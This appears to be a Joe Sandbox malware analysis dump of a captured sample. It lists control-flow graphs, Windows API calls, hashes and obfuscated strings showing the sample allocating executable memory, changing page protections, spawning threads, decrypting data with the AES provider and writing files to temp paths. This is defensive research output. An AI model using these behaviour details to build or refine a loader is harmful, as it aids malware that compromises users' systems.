                                                        control_flow_graph 3550 5f5497-5f5adb 3552 5f959f-5f99e5 3550->3552 3555 5f9a0e-5f9a29 RegOpenKeyA 3552->3555 3556 5f99e7-5f9a02 RegOpenKeyA 3552->3556 3558 5f9a2b-5f9a35 3555->3558 3559 5f9a41-5f9a6d 3555->3559 3556->3555 3557 5f9a04 3556->3557 3557->3555 3558->3559 3562 5f9a6f-5f9a78 GetNativeSystemInfo 3559->3562 3563 5f9a7a-5f9a84 3559->3563 3562->3563 3564 5f9a86 3563->3564 3565 5f9a90-5f9a9e 3563->3565 3564->3565 3567 5f9aaa-5f9ab1 3565->3567 3568 5f9aa0 3565->3568 3569 5f9ab7-5f9abe 3567->3569 3570 5f9ac4 3567->3570 3568->3567 3569->3570 3571 5f834f-5f8356 3569->3571 3570->3570 3572 5f835c-5f8367 3571->3572 3573 5f5436-5f6f2d 3571->3573 3572->3552
                                                        APIs
                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005F99FA
                                                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005F9A21
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 005F9A78
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID: Open$InfoNativeSystem
                                                        • String ID:
                                                        • API String ID: 1247124224-0
                                                        • Opcode ID: eeceef2ff05ee7b280857eae913ec1837b26906449111a11120d42003dc86d51
                                                        • Instruction ID: 9dcf450ed043ea128ae489b19fd19512e62a837a26ae322a31487e3800008fd0
                                                        • Opcode Fuzzy Hash: eeceef2ff05ee7b280857eae913ec1837b26906449111a11120d42003dc86d51
                                                        • Instruction Fuzzy Hash: 27415FB114864E9FEF11DF50C848BFE3BE4FB01304F140929EA8186940E77A4DA4DF5A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3575 5f5ac7-5f5adb 3577 5f959f-5f99e5 3575->3577 3580 5f9a0e-5f9a29 RegOpenKeyA 3577->3580 3581 5f99e7-5f9a02 RegOpenKeyA 3577->3581 3583 5f9a2b-5f9a35 3580->3583 3584 5f9a41-5f9a6d 3580->3584 3581->3580 3582 5f9a04 3581->3582 3582->3580 3583->3584 3587 5f9a6f-5f9a78 GetNativeSystemInfo 3584->3587 3588 5f9a7a-5f9a84 3584->3588 3587->3588 3589 5f9a86 3588->3589 3590 5f9a90-5f9a9e 3588->3590 3589->3590 3592 5f9aaa-5f9ab1 3590->3592 3593 5f9aa0 3590->3593 3594 5f9ab7-5f9abe 3592->3594 3595 5f9ac4 3592->3595 3593->3592 3594->3595 3596 5f834f-5f8356 3594->3596 3595->3595 3597 5f835c-5f8367 3596->3597 3598 5f5436-5f6f2d 3596->3598 3597->3577
                                                        APIs
                                                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005F99FA
                                                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005F9A21
                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 005F9A78
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID: Open$InfoNativeSystem
                                                        • String ID:
                                                        • API String ID: 1247124224-0
                                                        • Opcode ID: 4c26ce79796bf343194fcc164a310d392ed1f9e90dd348c625a21f2c0df0d2a6
                                                        • Instruction ID: 7cceff65ae6677488f6a6742bbcbb3cd7903075d08a392eed83326c7183a313e
                                                        • Opcode Fuzzy Hash: 4c26ce79796bf343194fcc164a310d392ed1f9e90dd348c625a21f2c0df0d2a6
                                                        • Instruction Fuzzy Hash: 1131147114424E9FEF21DF60C888BEE3BE5FB01304F140926AA8186991E77A4EA4DB59

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3600 402220-40223b 3601 40229b-4022ac call 409a17 3600->3601 3602 40223d-402241 3600->3602 3602->3601 3603 402243-402261 CreateFileA 3602->3603 3603->3601 3605 402263-402290 WriteFile CloseHandle call 409a17 3603->3605 3608 402295-402298 3605->3608
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040227E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleWrite
                                                        • String ID:
                                                        • API String ID: 1065093856-0
                                                        • Opcode ID: 0ce2a982ba24ae4bec4079ca5a6e20e5ddab37ddaeafeb09f518e5d42abd3d08
                                                        • Instruction ID: b0b2b5f3f087a2371d61f62415ac43be552c3c854a73bf1a6b1b437ed68fdf7e
                                                        • Opcode Fuzzy Hash: 0ce2a982ba24ae4bec4079ca5a6e20e5ddab37ddaeafeb09f518e5d42abd3d08
                                                        • Instruction Fuzzy Hash: D101D231600208ABD720DBA8ED49FEEB7E8EB48714F40417EF905A72D0DBB46D45CB58

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3609 410576-410582 call 4105a7 3612 410594-4105a0 call 4105c0 ExitProcess 3609->3612 3613 410584-41058e GetCurrentProcess TerminateProcess 3609->3613 3613->3612
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?,00410570,00000016,0040CDE2,?,?,6CC08CF2,0040CDE2,?), ref: 00410587
                                                        • TerminateProcess.KERNEL32(00000000,?,00410570,00000016,0040CDE2,?,?,6CC08CF2,0040CDE2,?), ref: 0041058E
                                                        • ExitProcess.KERNEL32 ref: 004105A0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                                        • Instruction ID: d13b5d96fb023a3732090606adae14321ad35c591e2cfba48d8bc5efe980f875
                                                        • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                                        • Instruction Fuzzy Hash: 81D09231000208FBCF01AF61DD0D9CE3F2AAF44365B008035BD094A132DFB99ED69E88

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3616 413cb9-413cc5 3617 413cf7-413d02 call 40d0dd 3616->3617 3618 413cc7-413cc9 3616->3618 3626 413d04-413d06 3617->3626 3619 413ce2-413cf3 RtlAllocateHeap 3618->3619 3620 413ccb-413ccc 3618->3620 3622 413cf5 3619->3622 3623 413cce-413cd5 call 412473 3619->3623 3620->3619 3622->3626 3623->3617 3628 413cd7-413ce0 call 4116b2 3623->3628 3628->3617 3628->3619
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,0042D884,?,?,004035B7,?,?,5(@), ref: 00413CEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: 5(@
                                                        • API String ID: 1279760036-4133491027
                                                        • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                                        • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                                                        • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                                        • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: +]w
                                                        • API String ID: 1029625771-3275653893
                                                        • Opcode ID: 8db6707f443a090d46ac83876dde182efa8ca3ba48d0d9cf66d2389f166e8213
                                                        • Instruction ID: b1e77fb0a783a6eca69ca270ff3dfdd64953930be3b33fe95a4ab23e32321e64
                                                        • Opcode Fuzzy Hash: 8db6707f443a090d46ac83876dde182efa8ca3ba48d0d9cf66d2389f166e8213
                                                        • Instruction Fuzzy Hash: 06F0277301C3089FE20C9E758D440BD3FC2EA8265073D8A2ED18246E48C57598014742
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A6B,?,00000000,?,?,00418A90,?,00000007,?,?,00418D6F,?,?), ref: 00413307
                                                        • GetLastError.KERNEL32(?,?,00418A6B,?,00000000,?,?,00418A90,?,00000007,?,?,00418D6F,?,?), ref: 00413312
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 485612231-0
                                                        • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                                        • Instruction ID: 7e89cfa69ba2342e108e5ce36ee60186f347c9ea1b2ef774ccc21c1ed0765b4c
                                                        • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                                        • Instruction Fuzzy Hash: E9E086355002086BCB112FA1AC08BC53B68EB44395F404036F61CD6161DA388996879C
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000400,?,?,04930223,?,?), ref: 04930E19
                                                        • SetErrorMode.KERNEL32(00000000,?,?,04930223,?,?), ref: 04930E1E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: cde5a3b3c13ea24342a81a9701624a15b179406e3d1d061124b4434b57ddea14
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: 52D0123124512877D7103A94DC0DBCD7B1CDF05B63F008021FB0DD9080C770954046E5
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?), ref: 006F4331
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000006F3000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F3000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6f3000_file.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 6a2614aba4083d232a712c690cb281d3348342946227a9d15f4b38050931aff9
                                                        • Instruction ID: 1e2f0058ea56bf964a3373e21860095499bf8dfaadcf6ca4d0f47bd019abf5a2
                                                        • Opcode Fuzzy Hash: 6a2614aba4083d232a712c690cb281d3348342946227a9d15f4b38050931aff9
                                                        • Instruction Fuzzy Hash: 3801F9F754C2492EE7029E649E50BFB3F7AEBD2730F30806EF94186D56D1550E099628
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,?,?), ref: 006D251B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: de5ac1dc3ee31704de60e1c6d680c51fdf30debd4010c93cb82bdfbcc54efdb7
                                                        • Instruction ID: 30f096f11addeea99ff449820b62752673dd3841a507e5ee1c8aa45543e676bb
                                                        • Opcode Fuzzy Hash: de5ac1dc3ee31704de60e1c6d680c51fdf30debd4010c93cb82bdfbcc54efdb7
                                                        • Instruction Fuzzy Hash: 6901A971A5528BEFD701CF14CCB5BEB3B65EB54300F141017E902CA784DA205D56DB59
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?), ref: 006F4331
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000006F3000.00000040.00000001.01000000.00000003.sdmp, Offset: 006F3000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6f3000_file.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 2cac6511f09e3fb88162af0566a3995e035491d3efb18c39b082d2617d9e5ec9
                                                        • Instruction ID: f53f979f492660066ce9cb74a300759cfa42ad60e34350f7cf8c308dcbe413b5
                                                        • Opcode Fuzzy Hash: 2cac6511f09e3fb88162af0566a3995e035491d3efb18c39b082d2617d9e5ec9
                                                        • Instruction Fuzzy Hash: CCF027B314860A6ED741DE98CE00AFF3AA7FBE2770F308028F2019AD65D2A61C054628
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                        • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                        • Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
                                                        • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 9db9550d2b0040da0cdb7bb8a4e1bba302af3cd909a02382d4d9abc6e7a197df
                                                        • Instruction ID: 49b2388ed45b6dd4a6afc7f5612ab249c90d962ccad329a02adc865fb706f5e3
                                                        • Opcode Fuzzy Hash: 9db9550d2b0040da0cdb7bb8a4e1bba302af3cd909a02382d4d9abc6e7a197df
                                                        • Instruction Fuzzy Hash: D6E02CB380C708DFC70C1EB8A5E40BD7BD0FE09691B224C2FE7E68A901E9784C406B42
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5f1000_file.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 054d7eb50e1671796e45ce3787e82664b88f6ae39ac0924612a0c0d88427faab
                                                        • Instruction ID: eac015d9194725d54edd3e742d239796a4808dcd544e2b8fda100b40b189c816
                                                        • Opcode Fuzzy Hash: 054d7eb50e1671796e45ce3787e82664b88f6ae39ac0924612a0c0d88427faab
                                                        • Instruction Fuzzy Hash: 57D0A773408604DBCB0C1FF891584BC7FE0FE14B51B26481FDAC686940DA318C04874A
                                                        APIs
                                                        • _free.LIBCMT ref: 10005C07
                                                          • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                          • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: ErrorFreeHeapLast_free
                                                        • String ID:
                                                        • API String ID: 1353095263-0
                                                        • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                        • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                        • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                        • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04788174
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4780000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: 1fa60e370d9ff9989d0afc0c1f463f637c3c2dbfac62dc2f7489f9d8fdd3caf2
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: D0113C79A40208EFDB01EF98C985E98BBF5AF08750F458094F948AB361D771EA50DF81
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402E6F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                                        • Instruction ID: eb79ea19b3e1abf3f5b24c483eecae43203cd8e5c5511bfeef65b24117358006
                                                        • Opcode Fuzzy Hash: 9b7f6f3ca0983af9e8fdb80d9d56c3a0869d2f15b64f49a49faae6a606d2425e
                                                        • Instruction Fuzzy Hash: 17C0483200020DFBCF025FD1EC048DA7F2AFB09260B00C020FA1844032C773A931ABA5
                                                        APIs
                                                        • VirtualFree.KERNELBASE(?,?,?), ref: 00402E8C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                                        • Instruction ID: a3fa6bbe5c1a250ebea8c2fc35f655263c95a0ace9f7750fc45cf9fcc5ecde2d
                                                        • Opcode Fuzzy Hash: c340e0d22e4fb20872e2675f8e927c09d9f86923da33760a30bf271b1d9be8d1
                                                        • Instruction Fuzzy Hash: 5CB0923204020CFBCF025F81EC048D93F6AFB0C261B408020FA1C44031C7339675AB84
                                                        APIs
                                                        • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04934011
                                                        • Sleep.KERNEL32(000003E8), ref: 049341A9
                                                        • __Init_thread_footer.LIBCMT ref: 0493477E
                                                        • __Init_thread_footer.LIBCMT ref: 04934944
                                                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04936D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04934B4E
                                                        • __Init_thread_footer.LIBCMT ref: 04934BDC
                                                        • __Init_thread_footer.LIBCMT ref: 04934E45
                                                        • CoInitialize.OLE32(00000000), ref: 04934EC6
                                                        • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04934EE1
                                                        • __Init_thread_footer.LIBCMT ref: 04935344
                                                        • Sleep.KERNEL32(00000BB8,00000000,?,04936D08,0041D8D0,0042DBDC,0042DBDD), ref: 0493555C
                                                        • __Init_thread_footer.LIBCMT ref: 04935652
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04936D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04934F4F
                                                          • Part of subcall function 04940A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04935D06,00000000,0042C014), ref: 04940A9E
                                                          • Part of subcall function 04940A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04940ABD
                                                        • __Init_thread_footer.LIBCMT ref: 049342AD
                                                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                                                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                                                          • Part of subcall function 04932487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049324BD
                                                          • Part of subcall function 04932487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049324DE
                                                          • Part of subcall function 04932487: CloseHandle.KERNEL32(00000000), ref: 049324E5
                                                        • __Init_thread_footer.LIBCMT ref: 04934489
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                                                        • String ID: O@K\$Y@BA$ZK\.$rmBK
                                                        • API String ID: 529012138-2391139619
                                                        • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                                                        • Instruction ID: ba7f49c3c92c41e25b9669459e84315abc78cae7170274a0d439b4aab7033058
                                                        • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                                                        • Instruction Fuzzy Hash: 7CF2E1B0D042549FEB24CF24CC48BADBBB5EF46309F5442E8E4096B291D775BA84CF55
                                                        APIs
                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049338B7
                                                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049338DB
                                                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04933945
                                                        • GetLastError.KERNEL32 ref: 0493394F
                                                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04933977
                                                        • GetLastError.KERNEL32 ref: 04933981
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04933991
                                                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04933A53
                                                        • CryptDestroyKey.ADVAPI32(?), ref: 04933AC5
                                                        Strings
                                                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04933893
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                        • API String ID: 3761881897-63410773
                                                        • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                                                        • Instruction ID: 64749f5dde0b280740c28bad1e501933a405dc80fbb39ba08c07b8f54b26fae4
                                                        • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                                                        • Instruction Fuzzy Hash: D8816171A402189FEB248F24CC45B9ABBB5EF46301F1481B9E94DE7291DB31AE858F51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A[.$Tew$[\Cs$]v[$g67}$vMk~$we=$x7;A$9|$9|
                                                        • API String ID: 0-3515520227
                                                        • Opcode ID: ddf1f20e121c5b96e191caa2606b3391a52c4e566547044ab5c3f08bff21109d
                                                        • Instruction ID: d49cb4a9c266321026201f6b0ec00df29b6e48da9ae6a0ed478ad4e54895ba24
                                                        • Opcode Fuzzy Hash: ddf1f20e121c5b96e191caa2606b3391a52c4e566547044ab5c3f08bff21109d
                                                        • Instruction Fuzzy Hash: 06B208F360C2049FD3046E2DEC8567AFBE5EF94220F1A4A3DEAC5C3744E67598048697
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023887515.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !Bw$!Bw$.mso$:|=7$E2Oy$OL_~$RWW$^)}w$f`g
                                                        • API String ID: 0-2773683150
                                                        • Opcode ID: e4c1cab9a2e79f51e94b43dd87a5a47161dc6df7a082df8200e47e0b85dbee95
                                                        • Instruction ID: 92a21e4e5668cbd072f125cfeb2cc39edb848c6b8819c91a17216942dcc935fd
                                                        • Opcode Fuzzy Hash: e4c1cab9a2e79f51e94b43dd87a5a47161dc6df7a082df8200e47e0b85dbee95
                                                        • Instruction Fuzzy Hash: DFB218F360C6049FE308AE2DDC8567ABBE9EF94320F1A493DE6C5C7744EA3598018657
                                                        APIs
                                                          • Part of subcall function 04940A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04935D06,00000000,0042C014), ref: 04940A9E
                                                          • Part of subcall function 04940A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04940ABD
                                                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                                                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                                                        • __Init_thread_footer.LIBCMT ref: 04935344
